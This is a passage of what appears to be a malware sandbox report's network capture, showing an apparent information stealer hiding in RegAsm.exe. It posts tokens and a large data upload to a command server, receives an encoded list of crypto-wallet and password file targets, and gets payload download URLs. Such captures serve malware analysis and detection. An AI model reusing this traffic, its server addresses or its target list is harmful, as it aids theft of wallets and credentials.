2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JKEGHDGHCGHDHJKFBFBKCont
2024-09-26 22:16:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:10 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49750	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:10 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJEGHDAECBFHJKEGIJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:10 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------JJJEGHDAECBFHJKEGIJKContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------JJJEGHDAECBFHJKEGIJKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JJJEGHDAECBFHJKEGIJKCont
2024-09-26 22:16:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:11 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49751	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:12 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJJEBKKEHJDGCBGCFCG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:12 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 45 42 4b 4b 45 48 4a 44 47 43 42 47 43 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 45 42 4b 4b 45 48 4a 44 47 43 42 47 43 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 45 42 4b 4b 45 48 4a 44 47 43 42 47 43 46 43 47 0d 0a 43 6f 6e 74 Data Ascii: ------BKJJEBKKEHJDGCBGCFCGContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------BKJJEBKKEHJDGCBGCFCGContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------BKJJEBKKEHJDGCBGCFCGCont
2024-09-26 22:16:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:13 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49752	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:13 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJJEBGDAFHJEBGDGIJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:13 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JJJJEBGDAFHJEBGDGIJDCont
2024-09-26 22:16:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:14 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49753	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:15 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 114889 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:15 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 Data Ascii: ------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------EHIDAKECFIEBGDHJEBKKCont
2024-09-26 22:16:15 UTC	16355	OUT	Data Raw: 61 73 6f 39 38 41 35 72 79 34 56 57 72 75 6b 31 5a 75 2b 72 73 30 33 2b 66 34 6e 30 4d 36 53 64 6c 56 54 75 6c 62 52 58 54 53 2f 4c 38 41 38 57 53 43 35 31 2f 77 33 70 30 58 7a 58 48 32 31 62 70 6c 48 38 4b 4a 79 53 66 31 2f 49 31 79 50 6a 66 2f 41 4a 47 32 37 2f 33 59 2f 77 44 30 42 61 37 76 51 66 44 72 36 64 63 7a 61 6c 71 4e 7a 39 73 31 57 34 47 4a 4a 73 59 56 46 2f 75 71 4f 77 2f 7a 78 58 43 65 4e 2f 38 41 6b 62 62 7a 36 52 2f 2b 67 4c 57 6d 41 6c 48 36 78 47 45 58 64 4a 50 55 35 63 32 6a 4c 36 70 4b 63 6c 5a 74 72 51 35 36 6b 70 61 4b 2b 68 50 6b 68 4b 4b 57 6b 70 67 54 66 44 32 2b 74 4c 66 57 72 71 79 31 43 34 6a 67 73 74 51 73 35 4c 65 52 35 48 43 71 4d 6a 4f 53 54 78 30 42 48 34 31 32 57 6c 65 49 74 49 76 2f 41 42 68 72 31 72 66 58 74 74 48 70 2f Data Ascii: aso98A5ry4VWruk1Zu+rs03+f4n0M6SdlVTulbRXTS/L8A8WSC51/w3p0XzXH21bplH8KJySf1/I1yPjf/AJG27/3Y/wD0Ba7vQfDr6dczalqNz9s1W4GJJsYVF/uqOw/zxXCeN/8Akbbz6R/+gLWmAlH6xGEXdJPU5c2jL6pKclZtrQ56kpaK+hPkhKKWkpgTfD2+tLfWrqy1C4jgstQs5LeR5HCqMjOSTx0BH412WleItIv/ABhr1rfXttHp/
2024-09-26 22:16:15 UTC	16355	OUT	Data Raw: 64 6e 70 6f 74 6c 61 32 6b 74 72 79 37 5a 35 67 6a 45 4f 49 5a 41 49 63 6a 50 2b 72 5a 64 70 39 57 42 4f 4f 6c 5a 39 6c 72 4b 51 36 50 70 46 78 64 77 52 50 44 63 36 68 63 57 31 78 49 56 42 64 59 76 4c 69 41 59 48 72 38 70 62 64 2f 38 41 72 71 61 33 30 75 36 73 6c 74 78 61 33 7a 52 6d 33 75 54 64 52 74 74 42 5a 5a 53 4d 4d 51 53 4d 34 49 41 79 4f 68 78 79 44 54 70 39 4e 6e 76 69 6e 32 32 57 46 6c 69 52 6b 69 6a 67 67 53 47 4e 4e 78 79 63 49 69 68 51 53 65 70 78 6b 38 55 34 34 4c 46 58 74 4a 36 4f 33 58 73 37 2f 77 44 41 46 4c 4d 73 44 70 4b 4d 64 56 66 70 33 2f 71 35 4c 35 7a 57 32 70 6e 53 35 57 69 4c 36 65 6d 79 36 6d 42 2b 2f 4f 65 57 41 50 64 56 34 55 66 51 6e 76 56 74 5a 59 32 4f 46 6b 55 6e 32 4e 55 57 73 37 38 6d 2b 6c 46 32 76 6e 33 2b 52 63 79 47 Data Ascii: dnpotla2ktry7Z5gjEOIZAIcjP+rZdp9WBOOlZ9lrKQ6PpFxdwRPDc6hcW1xIVBdYvLiAYHr8pbd/8Arqa30u6sltxa3zRm3uTdRttBZZSMMQSM4IAyOhxyDTp9Nnvin22WFliRkijggSGNNxycIihQSepxk8U44LFXtJ6O3Xs7/wDAFLMsDpKMdVfp3/q5L5zW2pnS5WiL6emy6mB+/OeWAPdV4UfQnvVtZY2OFkUn2NUWs78m+lF2vn3+RcyG
2024-09-26 22:16:15 UTC	16355	OUT	Data Raw: 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 4b 4b 4b 41 45 4e 46 4c 53 47 67 59 55 55 55 55 41 46 46 46 46 41 78 4b 4b 57 6b 6f 41 4b 51 30 74 46 41 30 4a 52 52 52 54 47 46 4a 53 30 47 6b 41 6c 49 61 57 69 67 42 4b 4b 4b 4b 59 42 52 52 32 70 4b 59 77 6f 6f 6f 6f 41 53 69 69 69 6d 41 47 6b 6f 6f 6f 47 46 46 46 46 41 43 55 55 74 4a 51 41 55 55 55 47 67 59 55 55 67 6f 4e 4d 41 6f 6f 6f 6f 41 4b 53 6c 70 44 51 4d 4b 4b 4b 4b 41 43 6b 6f 6f 4e 4d 41 6f 6f 6f 70 6a 45 6f 6f 4e 46 41 42 52 53 55 74 41 77 6f 70 4b 57 67 41 70 4b 4b 4b 59 43 30 5a 70 4b 53 67 43 53 49 2f 76 55 2f 77 42 34 66 7a 72 66 76 44 2f 70 6b 76 31 72 6e 30 2f 31 69 2f 37 77 72 66 76 50 2b 50 75 54 36 2f 30 72 6e 71 2f 47 68 4c 34 69 47 69 6b 70 44 55 6d 67 74 46 4a 52 54 4b 41 30 74 4a 52 6d 67 51 74 Data Ascii: KKKAEooooAKKKKAENFLSGgYUUUUAFFFFAxKKWkoAKQ0tFA0JRRRTGFJS0GkAlIaWigBKKKKYBRR2pKYwooooASiiimAGkoooGFFFFACUUtJQAUUUGgYUUgoNMAooooAKSlpDQMKKKKACkooNMAooopjEooNFABRSUtAwopKWgApKKKYC0ZpKSgCSI/vU/wB4fzrfvD/pkv1rn0/1i/7wrfvP+PuT6/0rnq/GhL4iGikpDUmgtFJRTKA0tJRmgQt
2024-09-26 22:16:15 UTC	16355	OUT	Data Raw: 4c 52 51 4d 53 69 6c 6f 6f 41 53 69 69 69 67 41 70 4b 57 69 67 42 4b 4b 4b 42 54 41 4b 4f 31 4c 52 51 41 6c 46 46 46 41 41 61 53 6c 70 4b 41 43 69 69 69 68 44 45 6f 6f 4e 46 41 42 53 55 74 4a 33 6f 47 46 46 46 46 41 42 53 55 74 4a 69 67 59 55 55 74 46 41 43 55 55 55 55 41 4a 52 52 52 51 4d 4b 53 6c 70 44 51 41 55 47 69 69 6d 4d 53 6b 70 61 4b 41 45 6f 6f 78 52 54 47 47 4b 4d 55 55 55 44 44 46 4e 78 54 71 53 67 42 4b 4b 44 52 54 41 4b 53 6c 6f 78 51 4d 53 6b 70 32 4b 51 69 67 42 4b 4b 57 6b 4e 41 58 45 6f 78 53 30 74 41 43 55 6c 4c 52 54 47 4a 53 55 37 46 4a 31 6f 41 53 69 69 6a 46 4d 41 6f 78 53 30 6c 41 78 4b 4b 4b 4b 41 45 78 52 53 30 6c 4d 59 59 6f 78 52 69 6a 46 41 43 55 6d 4b 64 69 6a 46 4d 59 6d 4b 4b 58 46 47 4b 42 41 42 7a 57 39 66 66 38 41 48 30 Data Ascii: LRQMSilooASiiigApKWigBKKKBTAKO1LRQAlFFFAAaSlpKACiiihDEooNFABSUtJ3oGFFFFABSUtJigYUUtFACUUUUAJRRRQMKSlpDQAUGiimMSkpaKAEooxRTGGKMUUUDDFNxTqSgBKKDRTAKSloxQMSkp2KQigBKKWkNAXEoxS0tACUlLRTGJSU7FJ1oASiijFMAoxS0lAxKKKKAExRS0lMYYoxRijFACUmKdijFMYmKKXFGKBABzW9ff8AH0
2024-09-26 22:16:15 UTC	16355	OUT	Data Raw: 6d 53 64 31 64 74 6b 7a 45 4b 36 73 45 55 44 37 70 42 42 42 36 6a 6b 30 57 57 72 57 4f 71 76 43 62 4e 4c 79 46 56 31 4f 43 79 6e 6a 6d 64 58 4f 79 56 69 71 75 72 42 56 37 67 6a 42 42 36 67 35 36 31 33 4c 4d 4d 50 42 63 75 31 76 77 32 2f 77 41 30 65 4c 50 4b 4d 5a 55 62 71 53 31 62 31 76 66 66 65 2f 35 50 63 75 30 56 52 30 71 2b 2f 74 47 78 46 77 4f 68 59 67 56 65 69 75 4c 4e 4c 70 59 4c 75 47 37 62 66 48 4c 49 72 77 54 4b 67 41 6a 6a 5a 79 43 43 6a 5a 7a 74 78 31 48 57 75 75 64 65 45 61 58 74 58 74 61 35 77 51 77 6c 53 64 66 36 76 39 71 39 76 6d 46 54 32 31 39 64 32 51 62 37 4c 64 54 51 62 38 62 76 4c 63 72 6e 48 72 69 73 6c 4e 63 30 31 49 4c 53 61 61 31 31 46 2f 74 63 50 32 70 59 34 35 55 42 68 68 33 46 51 53 78 6a 2b 64 69 56 59 34 41 55 41 59 35 35 34 Data Ascii: mSd1dtkzEK6sEUD7pBBB6jk0WWrWOqvCbNLyFV1OCynjmdXOyViqurBV7gjBB6g5613LMMPBcu1vw2/wA0eLPKMZUbqS1b1vffe/5Pcu0VR0q+/tGxFwOhYgVeiuLNLpYLuG7bfHLIrwTKgAjjZyCCjZztx1HWuudeEaXtXta5wQwlSdf6v9q9vmFT219d2Qb7LdTQb8bvLcrnHrislNc01ILSaa11F/tcP2pY45UBhh3FQSxj+diVY4AUAY554
2024-09-26 22:16:15 UTC	16355	OUT	Data Raw: 39 2f 35 4a 2f 38 41 32 64 43 2f 42 77 62 68 75 31 30 6c 63 38 67 57 6d 44 2f 36 48 58 79 6a 6a 4a 39 44 36 36 70 68 38 52 55 69 6f 38 6d 32 32 71 4e 7a 55 64 48 65 62 78 75 6c 36 50 42 33 32 6c 52 50 43 33 39 71 66 32 6e 73 78 67 4c 38 2f 6c 5a 2f 68 78 30 37 37 66 65 6e 2b 45 62 47 36 74 74 56 6c 65 66 77 64 2f 59 79 6d 41 67 58 48 39 70 69 34 33 48 63 76 79 62 52 30 7a 31 7a 37 65 39 64 6e 52 57 74 6b 65 70 37 43 48 4e 7a 57 31 39 46 2f 6b 65 45 4a 2f 71 31 2b 67 70 31 4e 54 2f 56 72 39 42 54 71 2b 32 70 66 77 34 2b 69 50 7a 61 76 2f 46 6c 36 76 38 41 4d 4b 4b 4b 4b 30 4d 67 72 76 66 68 31 2f 71 64 52 2f 33 6f 2f 77 44 32 61 75 43 72 76 50 68 33 2f 71 74 52 2f 77 42 36 50 2f 32 61 76 4e 7a 58 2f 64 2f 6d 6a 32 73 67 2f 77 42 38 58 6f 7a 7a 62 57 2f 45 Data Ascii: 9/5J/8A2dC/Bwbhu10lc8gWmD/6HXyjjJ9D66ph8RUio8m22qNzUdHebxul6PB32lRPC39qf2nsxgL8/lZ/hx077fen+EbG6ttVlefwd/YymAgXH9pi43HcvybR0z1z7e9dnRWtkep7CHNzW19F/keEJ/q1+gp1NT/Vr9BTq+2pfw4+iPzav/Fl6v8AMKKKK0Mgrvfh1/qdR/3o/wD2auCrvPh3/qtR/wB6P/2avNzX/d/mj2sg/wB8XozzbW/E
2024-09-26 22:16:15 UTC	404	OUT	Data Raw: 32 77 51 78 66 61 43 66 74 4c 66 77 6f 42 74 59 42 76 76 48 4a 50 54 6b 38 53 66 46 48 69 42 72 6d 61 35 62 58 64 54 4e 78 4e 48 35 55 73 70 75 35 4e 7a 70 2f 64 59 35 79 56 35 50 42 34 35 70 50 2b 45 6d 31 37 2b 7a 66 37 4e 2f 74 76 55 76 73 47 7a 79 2f 73 76 32 75 54 79 74 6e 39 33 5a 6e 47 50 62 46 46 68 33 4f 7a 2b 49 46 6c 48 61 65 44 76 44 38 46 6f 39 6d 39 6a 61 58 4e 7a 62 77 76 42 64 77 79 6d 55 59 6a 4a 63 37 47 50 4c 45 4d 54 2f 41 48 63 71 44 6a 6a 50 6d 39 53 74 63 7a 76 62 78 32 37 7a 53 4e 42 45 7a 4e 48 47 57 4a 56 43 63 5a 49 48 51 45 34 47 66 6f 4b 69 70 70 57 45 53 51 54 7a 57 74 78 48 63 57 38 72 77 7a 52 4f 48 6a 6b 6a 59 71 79 4d 44 6b 45 45 63 67 67 39 36 36 57 78 38 65 61 72 6c 34 4e 66 6c 6e 38 51 61 64 49 42 76 73 39 51 75 58 63 Data Ascii: 2wQxfaCftLfwoBtYBvvHJPTk8SfFHiBrma5bXdTNxNH5Uspu5Nzp/dY5yV5PB45pP+Em17+zf7N/tvUvsGzy/sv2uTytn93ZnGPbFFh3Oz+IFlHaeDvD8Fo9m9jaXNzbwvBdwymUYjJc7GPLEMT/AHcqDjjPm9Stczvbx27zSNBEzNHGWJVCcZIHQE4GfoKippWESQTzWtxHcW8rwzROHjkjYqyMDkEEcgg966Wx8earl4Nfln8QadIBvs9QuXc
2024-09-26 22:16:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:17 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49754	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:17 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:17 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HIIEBAFCBKFIDGCAKKKFCont
2024-09-26 22:16:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:18 UTC	280	IN	Data Raw: 31 30 63 0d 0a 4d 54 49 79 4d 44 59 77 4f 48 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 6a 56 6b 59 6d 46 6a 59 54 4d 30 59 57 4e 66 62 47 5a 6b 62 6e 4e 68 5a 6d 35 6b 63 79 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 44 45 79 4d 6a 41 32 4d 44 6c 38 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 63 48 4a 76 5a 79 38 32 4e 6d 59 31 5a 47 49 35 5a 54 55 30 4e 7a 6b 30 58 33 5a 6d 61 32 46 6e 61 33 4d 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 78 4d 6a 49 77 4e 6a 45 77 66 47 68 30 64 48 41 36 4c 79 38 78 4e 44 63 75 4e 44 55 75 4e 44 51 75 4d 54 41 30 4c 33 42 79 62 32 63 76 4e 6a 5a 6d 4e 57 51 35 59 57 49 77 5a 44 52 6a 4e 31 39 79 5a 48 Data Ascii: 